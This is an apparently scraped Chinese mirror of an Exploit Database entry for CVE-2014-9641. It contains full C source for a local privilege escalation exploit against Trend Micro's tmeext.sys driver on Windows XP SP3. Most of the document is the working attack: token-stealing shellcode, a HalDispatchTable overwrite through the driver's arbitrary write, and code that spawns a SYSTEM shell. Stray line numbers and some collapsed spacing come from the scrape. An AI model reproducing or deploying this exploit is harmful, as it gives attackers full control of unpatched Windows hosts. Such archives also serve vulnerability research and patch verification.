Trend Micro 8.0.1133 (Multiple Products) – Local Privilege Escalation

Exploit Database
112 阅读

作者： Parvez Anwar

日期： 2015-01-31
类别：
- local
平台：
- windows
来源：https://www.exploit-db.com/exploits/35962/

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

126

127

128

129

130

131

132

133

134

135

136

137

138

139

140

141

142

143

144

145

146

147

148

149

150

151

152

153

154

155

156

157

158

159

160

161

162

163

164

165

166

167

168

169

170

171

172

173

174

175

176

177

178

179

180

181

182

183

184

185

186

187

188

189

190

191

192

193

194

195

196

197

198

199

200

201

202

203

204

205

206

207

208

209

210

211

212

213

214

215

216

217

218

219

220

221

222

223

224

225

226

227

228

229

230

231

232

233

234

235

236

237

238

239

240

241

242

243

244

245

246

247

248

249

250

251

252

253

254

255

256

257

258

259

260

261

262

263

264

265

266

267

268

269

270

271

272

273

274

275

276

277

278

279

280

281

282

283

284

285

286

287

288

289

290

291

292

293

294

295

296

297

298

299

300

301

302

303

Exploit Title- Trend Micro Multiple Products Arbitrary Write Privilege Escalation

Date - 31st January 2015

Discovered by- Parvez Anwar (@parvezghh)

Vendor Homepage- http://www.trendmicro.co.uk/

Tested Version - 8.0.1133

Driver Version - 2.0.0.1009 - tmeext.sys

Tested on OS - 32bit Windows XP SP3

OSVDB- http://www.osvdb.org/show/osvdb/115514

CVE ID - CVE-2014-9641

Vendor fix url - http://esupport.trendmicro.com/solution/en-US/1106233.aspx

Fixed version- 8.0.1133

Fixed driver ver - 2.0.0.1015

#include <stdio.h>

#include <windows.h>

#define BUFSIZE 4096

typedef struct _SYSTEM_MODULE_INFORMATION_ENTRY {

PVOID Unknown1;

PVOID Unknown2;

PVOID Base;

ULONG Size;

ULONG Flags;

USHORTIndex;

USHORTNameLength;

USHORTLoadCount;

USHORTPathLength;

CHARImageName[256];

} SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY;

typedef struct _SYSTEM_MODULE_INFORMATION {

ULONG Count;

SYSTEM_MODULE_INFORMATION_ENTRY Module[1];

} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;

typedef enum _SYSTEM_INFORMATION_CLASS {

SystemModuleInformation = 11,

SystemHandleInformation = 16

} SYSTEM_INFORMATION_CLASS;

typedef NTSTATUS (WINAPI *_NtQuerySystemInformation)(

SYSTEM_INFORMATION_CLASS SystemInformationClass,

PVOID SystemInformation,

ULONG SystemInformationLength,

PULONG ReturnLength);

typedef NTSTATUS (WINAPI *_NtQueryIntervalProfile)(

DWORD ProfileSource,

PULONG Interval);

typedef void (*FUNCTPTR)();

// Windows XP SP3

#define XP_KPROCESS 0x44// Offset to _KPROCESS from a _ETHREAD struct

#define XP_TOKEN0xc8// Offset to TOKEN from the _EPROCESS struct

#define XP_UPID 0x84// Offset to UniqueProcessId FROM the _EPROCESS struct

#define XP_APLINKS0x88// Offset to ActiveProcessLinks _EPROCESS struct

BYTE token_steal_xp[] =

{

0x52,// push edx Save edx on the stack

0x53, // push ebx Save ebx on the stack

0x33,0xc0, // xor eax, eax eax = 0

0x64,0x8b,0x80,0x24,0x01,0x00,0x00,// mov eax, fs:[eax+124h] Retrieve ETHREAD

0x8b,0x40,XP_KPROCESS, // mov eax, [eax+XP_KPROCESS] Retrieve _KPROCESS

0x8b,0xc8, // mov ecx, eax

0x8b,0x98,XP_TOKEN,0x00,0x00,0x00, // mov ebx, [eax+XP_TOKEN]Retrieves TOKEN

0x8b,0x80,XP_APLINKS,0x00,0x00,0x00, // mov eax, [eax+XP_APLINKS] <-|Retrieve FLINK from ActiveProcessLinks

0x81,0xe8,XP_APLINKS,0x00,0x00,0x00, // sub eax, XP_APLINKS |Retrieve _EPROCESS Pointer from the ActiveProcessLinks

0x81,0xb8,XP_UPID,0x00,0x00,0x00,0x04,0x00,0x00,0x00,// cmp [eax+XP_UPID], 4|Compares UniqueProcessId with 4 (System Process)

0x75,0xe8, // jne ----

0x8b,0x90,XP_TOKEN,0x00,0x00,0x00, // mov edx, [eax+XP_TOKEN]Retrieves TOKEN and stores on EDX

0x8b,0xc1, // mov eax, ecx Retrieves KPROCESS stored on ECX

0x89,0x90,XP_TOKEN,0x00,0x00,0x00, // mov [eax+XP_TOKEN], edxOverwrites the TOKEN for the current KPROCESS

0x5b,// pop ebxRestores ebx

0x5a,// pop edxRestores edx

0xc2,0x08// ret 8Away from the kernel

};

DWORD HalDispatchTableAddress()

{

_NtQuerySystemInformationNtQuerySystemInformation;

PSYSTEM_MODULE_INFORMATION pModuleInfo;

DWORDHalDispatchTable;

CHAR kFullName[256];

PVOIDkBase = NULL;

LPSTRkName;

HMODULEKernel;

FUNCTPTR Hal;

ULONGlen;

NTSTATUS status;

NtQuerySystemInformation = (_NtQuerySystemInformation)GetProcAddress(GetModuleHandle("ntdll.dll"), "NtQuerySystemInformation");

if (!NtQuerySystemInformation)

{

printf("[-] Unable to resolve NtQuerySystemInformation\n\n");

return -1;

}

status = NtQuerySystemInformation(SystemModuleInformation, NULL, 0, &len);

if (!status)

{

printf("[-] An error occured while reading NtQuerySystemInformation. Status = 0x%08x\n\n", status);

return -1;

}

pModuleInfo = (PSYSTEM_MODULE_INFORMATION)GlobalAlloc(GMEM_ZEROINIT, len);

if(pModuleInfo == NULL)

{

printf("[-] An error occurred with GlobalAlloc for pModuleInfo\n\n");

return -1;

}

status = NtQuerySystemInformation(SystemModuleInformation, pModuleInfo, len, &len);

memset(kFullName, 0x00, sizeof(kFullName));

strcpy_s(kFullName, sizeof(kFullName)-1, pModuleInfo->Module[0].ImageName);

kBase = pModuleInfo->Module[0].Base;

printf("[i] Kernel base name %s\n", kFullName);

kName = strrchr(kFullName, '\\');

Kernel = LoadLibraryA(++kName);

if(Kernel == NULL)

{

printf("[-] Failed to load kernel base\n\n");

return -1;

}

Hal = (FUNCTPTR)GetProcAddress(Kernel, "HalDispatchTable");

if(Hal == NULL)

{

printf("[-] Failed to find HalDispatchTable\n\n");

return -1;

}

printf("[i] HalDispatchTable address 0x%08x\n", Hal);

printf("[i] Kernel handle 0x%08x\n", Kernel);

printf("[i] Kernel base address 0x%08x\n", kBase);

HalDispatchTable = ((DWORD)Hal - (DWORD)Kernel + (DWORD)kBase);

printf("[+] Kernel address of HalDispatchTable 0x%08x\n", HalDispatchTable);

if(!HalDispatchTable)

{

printf("[-] Failed to calculate HalDispatchTable\n\n");

return -1;

}

return HalDispatchTable;

}

int GetWindowsVersion()

{

int v = 0;

DWORD version = 0, minVersion = 0, majVersion = 0;

version = GetVersion();

minVersion = (DWORD)(HIBYTE(LOWORD(version)));

majVersion = (DWORD)(LOBYTE(LOWORD(version)));

if (minVersion == 1 && majVersion == 5) v = 1;// "Windows XP;

if (minVersion == 1 && majVersion == 6) v = 2;// "Windows 7";

if (minVersion == 2 && majVersion == 5) v = 3;// "Windows Server 2003;

return v;

}

void spawnShell()

{

STARTUPINFOA si;

PROCESS_INFORMATION pi;

ZeroMemory(&pi, sizeof(pi));

ZeroMemory(&si, sizeof(si));

si.cb = sizeof(si);

si.cb= sizeof(si);

si.dwFlags = STARTF_USESHOWWINDOW;

si.wShowWindow = SW_SHOWNORMAL;

if (!CreateProcess(NULL, "cmd.exe", NULL, NULL, TRUE, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi))

{

printf("\n[-] CreateProcess failed (%d)\n\n", GetLastError());

return;

}

CloseHandle(pi.hThread);

CloseHandle(pi.hProcess);

}

int main(int argc, char *argv[])

{

_NtQueryIntervalProfile NtQueryIntervalProfile;

LPVOIDinput[1] = {0};

LPVOIDaddrtoshell;

HANDLEhDevice;

DWORD dwRetBytes = 0;

DWORD HalDispatchTableTarget;

ULONG time = 0;

unsigned char devhandle[MAX_PATH];

printf("-------------------------------------------------------------------------------\n");

printf("Trend Micro Multiple Products (tmeext.sys) Arbitrary Write EoP Exploit \n");

printf(" Tested on Windows XP SP3 (32bit)\n");

printf("-------------------------------------------------------------------------------\n\n");

if (GetWindowsVersion() == 1)

{

printf("[i] Running Windows XP\n");

}

if (GetWindowsVersion() == 0)

{

printf("[i] Exploit not supported on this OS\n\n");

return -1;

}

sprintf(devhandle, "\\\\.\\%s", "tmnethk");

NtQueryIntervalProfile = (_NtQueryIntervalProfile)GetProcAddress(GetModuleHandle("ntdll.dll"), "NtQueryIntervalProfile");

if (!NtQueryIntervalProfile)

{

printf("[-] Unable to resolve NtQueryIntervalProfile\n\n");

return -1;

}

addrtoshell = VirtualAlloc(NULL, BUFSIZE, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);

if(addrtoshell == NULL)

{

printf("[-] VirtualAlloc allocation failure %.8x\n\n", GetLastError());

return -1;

}

printf("[+] VirtualAlloc allocated memory at 0x%.8x\n", addrtoshell);

memset(addrtoshell, 0x90, BUFSIZE);

memcpy(addrtoshell, token_steal_xp, sizeof(token_steal_xp));

printf("[i] Size of shellcode %d bytes\n", sizeof(token_steal_xp));

hDevice = CreateFile(devhandle, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING , 0, NULL);

if (hDevice == INVALID_HANDLE_VALUE)

{

printf("[-] CreateFile open %s device failed (%d)\n\n", devhandle, GetLastError());

return -1;

}

else

{

printf("[+] Open %s device successful\n", devhandle);

}

HalDispatchTableTarget = HalDispatchTableAddress() + sizeof(DWORD);

printf("[+] HalDispatchTable+4 (0x%08x) will be overwritten\n", HalDispatchTableTarget);

input[0] = addrtoshell;// input buffer contents gets written to our output buffer address

printf("[+] Input buffer contents %08x\n", input[0]);

printf("[~] Press any key to send Exploit. . .\n");

getch();

DeviceIoControl(hDevice, 0x00222400, input, sizeof(input), (LPVOID)HalDispatchTableTarget, 0, &dwRetBytes, NULL);

printf("[+] Buffer sent\n");

CloseHandle(hDevice);

printf("[+] Spawning SYSTEM Shell\n");

NtQueryIntervalProfile(2, &time);

spawnShell();

return 0;

}